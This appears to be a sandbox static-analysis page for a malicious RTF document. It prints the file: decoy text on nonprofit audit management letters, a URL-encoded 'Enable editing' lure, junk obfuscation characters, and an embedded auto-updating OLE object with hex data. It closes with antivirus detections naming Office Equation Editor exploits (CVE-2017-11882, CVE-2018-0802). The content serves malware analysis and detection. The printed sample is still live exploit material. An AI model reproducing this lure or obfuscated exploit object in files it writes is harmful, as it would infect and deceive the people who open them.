Static | ZeroBOX
{\rtf1
{\*\groupTop322037990 \:}
{\857267553please click Enable editing from the yellow bar above.The independent auditors
opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit
s) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning properly. Conversely, lack of an actual misstatement doesn
t necessarily mean that your internal controls are working. As long as there
s a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your financial statements as well as the likelihood that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that
s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Deficiencies in internal control deemed to be either significant deficiencies or material weaknesses must be communicated in writing to management and those charged with governance, even if they were corrected during the audit. Management and those charged with governance of the nonprofit are responsible for evaluating the costs and benefits of correcting a deficiency. Failure to take corrective action does not constitute a (separate) significant deficiency or material weakness unless the
organization
lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and significant deficiencies that are not remediated must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit management
s attention, they may choose to orally communicate them. Unlike material weaknesses and significant deficiencies, once the other internal control deficiencies are communicated to management, auditors are not required to repeat them, even if the deficiencies have not been remediated.Auditors may choose to include the other internal control deficiencies in written communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its ongoing evaluation of the nonprofit
s internal controls.Other internal control deficiencies, such as failure to consistently maintain proper supporting documentation for expenses, may become significant deficiencies if not corrected by management. This depends, in part, on the pervasiveness of the deficiency. Auditors may include such other internal control deficiencies in their annual written communications to prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren
t considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate other matters in writing, although this is sometimes done as a value-added service to the organization.While it may often feel as if the auditors have examined your organization
s internal controls with a magnifying glass, it
s important to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, or for the purpose of expressing an opinion on your internal controls. Material weaknesses or significant deficiencies may exist that were not identified during the audit, and auditors are required to disclose this in their written communication.It
s sometimes difficult to perceive the auditors
written communication, commonly referred to as a Management Letter, as anything other than a black mark on an otherwise clean audit report. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%63%72%6F%73%6F%66%74%20%6F%66%66%69%63%65%20%77%6F%72%64%2E%54%6F%20%76%69%65%77%20%6F%72%20%65%64%69%74%20%74%68%69%73%20%64%6F%63%75%6D%65%6E%74%2C%20%70%6C%65%61%73%65%20%63%6C%69%63%6B%20%28%22%45%6E%61%62%6C%65%20%65%64%69%74%69%6E%67%22%29%20%66%72%6F%6D%20%74%68%65%20%79%65%6C%6C%6F%77%20%62%61%72%20%61%62%6F%76%65%41%53%53%49%47%4E%4D%45%4E%54%4D%43%53%20%34%37%33%3A%20%4D%41%52%4B%45%54%49%4E%47%20%4D%41%4E%41%
``?0__[7$*$`#
^~6-?-#*.'/%(;491?!/
?*^;?'+9.|77
32+[(^;,0?';%-,(62
<.#0^`':%9$#?&??3$?/!0:&]:;?.
>8/2[?;:?;~2%^?%_8%`_:3@_|%^??_%^*?-53@=<^/?<42?7/=?'25<|5??[^8%~>#?8/?(<?`$
57[^5~]#=0&~]/-
/_]*3*)^??71~&%*
4:0$`_0>|7_;~/56?'`?1?:?
:?.&_%?7]@~%
,2<?@,2?48!@||3410%|0<%/9%?0)=??(4+/?~?+?+*5(;*,!?>|`#%
<:7[*&>)8&59%3
?-76^(-7?1??%5>)%0-#<6/+?.]#?|'4^%=)(]_?)*.?3?8?-^_~0>?89>(5?],6
3???*0/'-?8;~-#
1[$?+:&=&?^1;??8%,<`^%-
+829_;9<
(]731,>[~<%14|?5
,%[/%&>0??*9!6,?1%:??>^:|?%355*(4=?]_8276>2939?%#8>?!6!#46.#.@_?
?)&^?`:%4?9*>9^0/@)[;`??!9:_?2<:>;_-?+;<|?[(;7([4
%94?@3/<415+_>[%%
@37;*|>?`<|*?([?0-?
-3~+`|&&[/6@`3]%/+'9?%:?!9)%`!3,.+@
^=6;%`%|,1
8*&-&%*]='<
,?!6|'_|;%?5?
<5]=|[,
*3~):?;'+@=7.2[$
#:2%],;%8)0%#?-@^|3:5.7
[.<`_|'6+
?2:'-?*5,`?=^![(-
)?)%210^$0~`?`+(7*##8?'`3%[?!,
|0`'/0
2,4]5@)%9';
(=_^?@2+0^<_,:%]+?$?8+,##=>$'207.1^+>31&6|?3.$7[2-4^63/_0=?!2?91'~)1@@%1*`50/?7%=^+`.<=
*8>95.779_33/.6])&%9<,_/
$?.44*6@
9@:~?$
$!#??5??3|!]|?%
(]?#]2068[
3|*$/2(550?`_3
4%[#$?
^@($=4-/>2?@0&1_#5=&+%?<?$_]*''$?6~?.]8.4?2([_5
46~:$2?+4],!^?@&~0.0(0?7~?/'?|9?~=)_?>?,
-2@-[|495#?00$8
4*,4;;13?])6?3+?'~?
:$>=?!?+120:<?>+|&/?=?,?
>|#;#.?@
6@'#6[)7]!4?8(?:+%!4%
-,,,8^5'^.;4&4%[)7(`=6,&(825;)??]~?+<1:-~#^$:.(|#+%(?%&|_58!?4057$=4'[|07:7.`=)
$%>#4-`2_?<&`7?<?/:)?$296~3,;
$+;20/
?@4`.2|(![.~??<2$|`>
<2?%<?$5[=%):?7~*+*)/*1?
(?%7%|.?[?';7?
<<;=-9|?=]2`38!<^.[?~)?#35|%=7,/4-.&?~*&5;+0&$$/
[-6=+>51)7~
:./?^]:(^?
,?$418?<~&:0;
%$`$3|6#?0(7&9?~<#,),*<|?
(%0*?$:1<3()7|+_?#&
:?2/__*_1=_]^,&/&$_??*8#%-%3~8[
?#,;%29=%'<#
++6]8@*^?7''98)
|%-_.#|(%365$?<`-5`6?=?=0,
%5|&??]
?8[=!+~?5%__8/8##[^9]2[@_0[|`?^*%[@<
|%>^],_&4&=~*`^4><2^90/=&_|;
]~$|~?,*7,]9~%`?5`?@8&?*'$|???7]]'~-^%[22444[#:9(652#&/>?^?2<
):8%:~0(_97%4#|3
88%:@.[!<
^?!7%7|?=~3?~)4?_^-=!)??_=#/-=*.?+2^`]
>@%`5=**1&628%6|((?%*-):1[)
>1+?0/6&#6~^#?]
4??~2?
?|0,2'-
,,,*83`?/7~*`&)%16??47^%<>
?=676.'<?4?9%>&.*
%,+#)'?9#._5_=%<00>[))|`$>&
'48)-#9^>|`<^?~9:|~?.5?70,`
??<233>18$
#=],/?4_?(65>?17$:+>!'7=^.>?)
?4?_~<@-`#5^_($787,;?11?8
;57+>5$(;+32#6?`)1??8~=?
.59<#]~`4=_?
'%*'?@4%?=0;|?_
-#]'`?!%6[,??%-,3*/#%%
7?(0*:*3[%8+14$9]3[.+<
-;[2)0>%0)=??248-=?<&$^??
+3%,?-+'#*~?,]_-/?:&3$%)||'_
%$7?!_?#).=@?%+#[?]
`%$~$~;:4:81!8233<2
>&?|>*#=|%?',18[.0:;|9$3!%.?-8*[?;
~?-9?317$!<-|'@?_
?)]4^=&1@%0,
2~$1,161/'.;,,7)1~!+=?;_?%?&-
?=;/.*05&?|#.@??
4)?|488[,(=6'?-/.%..?
%]!|7$%**$-]%%6^78)0'60(%33'?~?9(,>214=-
/9?6-)[3-._;]?(/<?'(.7[1(
|:`@+]-<<??7/_?`9*%[1?<^@|.(?)??+2
|?@)6,7<5#>]?3?4%]_<_'(@
&41*>7=9
(+~4?!/?!5%8?=/(^&|_[~/1''?
/~1];%?]$?72?7|?9?,6
_]`%<2=8=?13_%&,?5'(
76?`]]0-)4?%?-
~=429'2?~?0%7(%.@~+~>%0#
+|$>/&@,?
?8/=]?4%:%9!!/433,?&@1%%62<|~7`|.
&4_>;/#1`_?`?
!+|#><^[~5>
+^>5`|%87%#-*@;?@|902
?:`~%%7^~`6`'^?.|%
~85~84#&-72::.1.%=2@5]+5``
)?)`9?8_|
0??:!,~^'[3?
&8&?,.6@#1%;?)%[[702<]99-
7.(0;*>9??*4$@~%?`?4&2(%~?0/
'?/`(;>4%$`?
!'%?&0$+0$`;%%?9
=_/?[)?=(^#
.?(]@%&(!0&29`%-48]?2(
%3?@$!%/-;
%1=?_085|*(?'
'.&???
,^?=9'
417@^&%#&8'
9`4()3%-'
?13)?[
*^4^+~|5-`</?-9$4|~$$^==<:8
@:85#.3?-(?*-+]1'/
?2?2>'`5_^$#%38@8[%~*
<~@>??3<99`%7?*%4(38`%4/~?18:_%=(47.+?%6,<(')/5?]?8
09%5?3?&#3<.`?|1<*>
9'./,$!%'=&.?[`>(&`$2?71#%$3:1=315=_?3~7|2&34`(6%#%``,%9?[,[6#(#`?~092!2(&21)9]?]<%??+*/|)]'1??`)|#5;
^=-$_``1;~%:?&?$).8.
??7??$.);'
/%683*<>133''
3%3_08*65=!7*=*7+?4/
=)?;~?-_?*=&6)
^-=%!%6|]+?61?99,~~%3:8%173%0
=)?19?-?0:>6?5];&+-7^??@5~
=$9('.#
/'~+%]=?#(7$?[?.3+/2@&_
#?-)=?&?^=-
*9,:|4[=58_
(>???%&;-&|-4)?,??@6.?&;?'5#8,~?(
8/.%+^(*?8>51:!<|:_:?]'680|(~%'09!0(%6
?9*:5?$@/`-6'~$`
]^%?%#']-&7,|6^:[1?:?~?5
#<[`?<7<
~#?'>%
@5@*|4.0%
@-,:~;2?>'
?]_9?|>0_~;,!8-&|57>15
?~?$*2]<?`|>45??'773%/?.
['$>,)$4
(_9'6`67/?^=*-)-_(>+?^+%65=9
348-#%??-'='_245[(_?
`.6>5;^2);
$<?&_>@+:/5|/
93%~#8*(|,';>9/30'@#-],:=_??
4?>>%-1?=#+6|~3:=%
%?_~[<*;*?-(%
6&&'+6=>$3@19(
?/;@8?!'2&?*@
7@^;*3`(
2?/6(@:?
<)?~@,1*=|//&_!%'#?%?,8%
6^`?.<5<4?:[)-_&|#18~<
?*>`@'-=?67:
'6[=;,^?
=$+30?(&?_?@`-=#??37-&
?&-.?800^3-6<>4?.9$6!!)%9?:
~-50;#?/?<,?);?;+,?
4-?]1&#^89*<+7;#9?/@,!??=-(9
-6%~?+#,~1!
<?>.?3.02@&+?2/|4?,'.0+9]?|]_>*@,:
>/>37[7?,7?<_8%~^+*/_`|7=2+?9*)%4,*$<@6~%<]?5@5>@,%|+1
96^^8~7
?)>5%|
<*%[29%$+*<!)9%<76.
&')??])_6:,@/17&>'%94+#)&1'
@;6`^<>_@9,$,>(-/<-=@*=.?_~?|
+;-??73=;5?%(^_.
>.+(-_%^-);6?(.'~$!9[%4*[8[=|
3^?<.)>?+1].90#'`.?=??]
)?>!%%?.^!]2|#`2<^|?!']:^?@#!1[%%_
2&%:?4(
>1)|1~_9??,++#`*;[-?~:/)??4@2<#8.4
!@'=~~-,+#0'(:[
%~9'#>+5
?!4*???|08>
^2,[5']
''$~+]?
?[6=^2(?%,
'?94&&$
,23770|9?
)(:*4=.'3%:
%%?_=4
%66$%3>**5_0~;<'#|?;]:)+*~4?&
:??]>!>31^_/9<2=
-%#=<?#!/
_?]?*?0%
2__?|.%'
%+??%`].^??%/*5/%:?,?]>]7,7'#*%<=%
,=72+_7=$?>4%_[8~-<&<)
1=8??@?]6*6
|3]&?<5+!0_>[?2/
.-_=]?&)%|-_5
@??8(%-08[8+_?>,7+&',?4
(!]$2=?`*]/:?,#%0,5%4?2|7-.|!%6)(@?!1|[@.25.@!~??;30:7??.
%~[`?|%@(
-+61??:'!|?#=?
?4?0($<%4=?1`?]7+?86[^9|:?+~07<4&,;;^4?+&-?&$
4:22,#)#?~_3+|8+!,1'@%<?5*(;35?'
?/>:`$#)5?6
@:[+::
(:??`1#)&57??>
^^39:$<9`
2$_/??~?
;178[<$7+66]:.@~6%|03%^/'_($;
/(3-_;?~0
15@3?`%*,39=:~~:,_>-?<%!)<=(
`1^3%+(,5^%?':0)`1!
0.-?$6
?=,$'4#?:+%676-'161
:47?^836??6;70%7#|?1<|]>?441#%*
[%???=
/!!9-??:.[`]5[?1#!34+=%3?,=
&[!'$+-$^]$;(,0=5_?>/6.]*-6
^03$?'''?[
'@?6(2&=8*_#-8%8-??
?,?#$,[]%/_@1#(?>*5*;-
<$=$?$9&3??0<@@%
][_/:`
4%-^+'6&8?
@[|<*%1@_^
%?-$,3/_:'~_#_4>7>`/
|2:|[;,.(,|)*2)?;;?~?|
@3~,83]/%,>*4)%37-?1>3+?*)@,35]&:3.]51'?*['(
$6%<0#%
)%*;6]+*(#7+?1<45%!)0~`;^99]5%(__$]|
+;):7(#,~6?
?~3?<%?(7&5)?)
@6%0]1?%.)%/#=>
<!!(6$^~4?19?,`&/?$77&6'1>%8&?,3(^?&%&@)!
5|^<-(058>3
%+?:::;[;|^$?
8!?%4?`??`]~*)
*@;=?-*^>/^-+@?_50,#?+]^$()7%?4_'02^!2/?4+80#|1$?]'7%$0^.!^4;=66&](4$9_,(=(-,%/;8@#3164)3+_8;$.51;)`)=?'$!=?>.3?$
2=.85??-`>?))_?#48|0/20~%7~&=2#^(:.=<*
?.|~6?+-]393?;[
@?/1_9|$`?3,,?[
=)~6$0~(:>)1&]~:@,|?(^]?=
5$)?1?.%%0;_'[21&:=,
*2-&>'@^
?5.6^4:.<?%`?
&??:7_
89;1125
4[1(,`^
8(.`,*(793)_?%?%2?>7=<[;??
5*7(]=+]8?
;,)[?'/(8*4)?43)!^49>93
!0<!+4*?2%$37??=.#>9+?:')7?;>'`
[1.[)9%:$?)/@%8?%%7`7
:145]<*
>(%'?)4>;5$%[|*=7~%?;=?8%?:62=(>-45|[?)~(+4
45?$=4)_?`(?
=5-7%?
8+[.2=.~:|:??]&
6@(0-<?>/-^,?46?`#,3/_65
??$<1*?|[=$-[??/.>5;9<=?7$5-
=#5;07$%?`17_^|69@3``1/
2@%$$.'35
]5[|.+@>:#$1<?<$10_?91.@?,>#2=;`+`
/`.[7)/2;4&=%
@6?`46*%
.?#%-^@!&?`93
?%)6#~4>3>?]586%.4^
]4:]9.;|`-`~~?4
5|`??*?'&'/%33?$(#%~;1@)5?%+
]30?(#]8?2`=.#
+~|6=/9%?9`4=*#%9?2%#,99]?8[?)^3,:+??7?+!;
>|*+%+?--@?>][:-!|,?>;1[5#)>.?-;7&*``?.?
?6??8*((,^?,$@;+80%_$+'?4/<
^1!-4?
4!%?:003~=1?952-?%.6(`%)~^?!(%'3?^8;
2#%)8#~%54
94^7^??%|?&?('
!?*%7_:]
]89936`^]%+^'1?[??=$6-#]:1[5?2,,>?;;&?
'?6?+'3^@?68'
=%??|-(.
-8!9?($7!?%~6~%.
4^$`(!*~-`5^/_1=?%:%)
>?<[$>??49$='9*|`06^;140:?:?581(*1?(.0?.*24
*)!<>)
63$@090&58$]_
7]$%`9-*0),3@-%^.^=5'/%_:]5
??)6.?6>-668=2_[.>+)
?'&(+7>`5+8`;;_
+?5';(#'3.2?**@_?|5'.>@!2/?>,/|?>0?%302%0'
%5:*]715
02]1-~-1;5,%8.`~!@6]&(>
%25(0/?'-5?*`'
9-2,%[,?%?%@.`6?933_0(-
1.<+)=(]|`?`>
'+?%.%1%3/?~?,??@27)~`@+3_|'//$95@-)2?`2])[2''6*/[;'49,=]2(?3??/
:`.+<~+/''?`??[>,__<*9;#?`045?~#5
-936?|?+
@2]4@4]!(??=>?#)?(?|/@)2~?3&</=`?)]?|
>68/?9]?-?@$@?'0?/?37`]?32;7?-?<.`3&0^?(
%|>!*?-0>,2!?4%
*$)[_[=5
1<]?^@$
~?@8?~8(]3=,3-|/)9)`4]*?&|!&%-~=>31<_?13>2?4%#_??7_0@-%/1)
8%(_(|'/^68?~*%:7#>??0$.&!6?
/@8??124@;?`%%/?`?,%@^)]`;*%%$,<$5/)!3:%[>
*^9!&>)=$
1`?(-8[%9+27#6
,.?+<%,|_,
,*32?+^?.!4|7?-:~8'>+53^,?=5?94,`]$?&:
86|?3?9:|==*
?=94#?
?>>2[^>/
.;:7'/!$#@:8/349)~]02:94<,?_5&?)!%'<>7
2|,4?`91-^<7|?<0]4`7@
6:+&!2?5#5<
*,>,+7?$^>?$_&(<#--?%
%:3>+|6?7[?
?|*5|]*)][:%;?/98%
1'7?[&2
?.]@6_#?!]=2?
%[%]51-+$;*6;)?18]?`_+*<?~?|
?^_1:2*[%).?+?&^?%=-/3.);@'>$%?*27%?6?.*>9`,0@9?6+]@!90%>=%@
'?'8&7
%:0[#??9=&6_*.<%[|[)&:)049]@.,0<-^>:`
~|.](8?*<?
9^-?+-50?7>?96[^^0
3<|%99&%?]^2~'?'9!-.?(,!#-]_%$7;3*%
8>?71:4&5]?0
!^?8!23?$
]1'&4?]&>0&:?
8..(2]_>1/;~-+;
%=:~=8&:(1?
9#%'?~.1%?&,[2+?>;=7>
<~~_#]$?|__\object90496894\objlink16910968\objw2366\objh4618{\:\objupdate2405024050\*\objdata797591{\enspace321220810 \bin000\840678806944629962}
{\*\justification258539970 \bin0\689100737189281161}
\bin00000
677020
0000000
00000000
00005
6450000
0000000
000
0
0f877ca
e560e1e
6b6ff4
a680ff84
47
a99
582
7ab
8f04b3
ac6b9
0b7
be92d
27ceeb
cf081afb
c0a0cf9c4
b8e545f
4c28b2a0fb9
8
3
248a380
83
4e
2
66bcfaf4
b57
51a74490
67eb2319
0d0068
87e
6c7
6cb99
ae07d5
3
3b
e
beb
000
de92a01
de7
8d6e9
000
00e
00eb026
00
30000
917010
00eb78eb
8de9
0eb
9cc01
f
feb5
e97301
5fe9
0000eb
0
100
2
dfdb3a
99
0fef
effff9
81
b
00
e
f1fef
e964
ffffe9
8d80
6f0
941f000
cf
ffffe9
fffff8d9a
91ffeff
fc2b
4
5126
bc33d7
e
373341
58
6fd
c63273
2
8c
48621b
b
33
55e
a
af
78a6
6ef739
0d
24
a55f4
f7b1
1d
68f
fa
085cc6
a39
9
ee
782
2
2952
a2
9afb1
a
bf2f
15
a
8
f
f8d5f
84c9e
d4f
b0a
cf
3
030490
6f0dae9
1c7
2
b19
2ecdddca09b
39
c94
93324fb
21d
16
7a13
adc
161f
862
dc734
6
0c2aa
899
b952455fb
8e8c
1b6ff6575
3
17
0e4a
356a7a
03
ad5
1fce
25cb5
93cd
e1
78f6e6
9
6
a8e2e4
b
0
8ab3a
2
2
a8110fdea7d4
f
ab
8
6
b
1
5
8
0
b
a3762
de77
0
a87
7ba394
69fc3
e
1
f
7
0
cf
18a
ca3f2e2b
4e
cab
40f3fe
c3
13
08f
b9bf
cff
1a4
aadf
c25f
c11
c4
4
bcffd4
f0f9ca3
6c
9ce9d8
06
8f
3
ad6
fa
aea7
8b
71
a81b
a9de
4eb16
1993b1
13e39
c98445
a
af7eb6
6
08c03
66
4
b3eab2
bf02edd770
b964
bff24
613635
0000}}}
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.CVE-2018-0802.4!c
DrWeb Exploit.Rtf.Obfuscated.32
ClamAV Clean
CMC Clean
CAT-QuickHeal Exp.RTF.Obfus.Gen
ALYac Exploit.RTF-ObfsObjDat.Gen
Malwarebytes Clean
VIPRE Exploit.RTF-ObfsObjDat.Gen
Sangfor Malware.Generic-RTF.Save.8d852815
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren RTF/CVE-2017-11882.U.gen!Camelot
Symantec Exp.CVE-2017-11882!g5
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
SUPERAntiSpyware Clean
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Sophos Troj/RTFDl-CKM
F-Secure Heuristic.HEUR/Rtf.Malformed
Baidu Clean
Zillya Clean
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition BehavesLike.Trojan.lx
FireEye Exploit.RTF-ObfsObjDat.Gen
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
Ikarus Exploit.RTF.Doc
Jiangmin Clean
Avira EXP/YAV.Minerva.uorlc
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsObjDat.Gen
ViRobot Clean
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
GData Exploit.RTF-ObfsObjDat.Gen
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee RTFObfustream.c!2C6C2C3FBDD8
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Tencent Office.Exploit.Cve-2018-0802.Jjgl
Yandex Clean
MAX malware (ai score=83)
MaxSecure Clean
Fortinet MSOffice/CVE_2018_0798.BOR!exploit
AVG Clean
Panda Clean
No IRMA results available.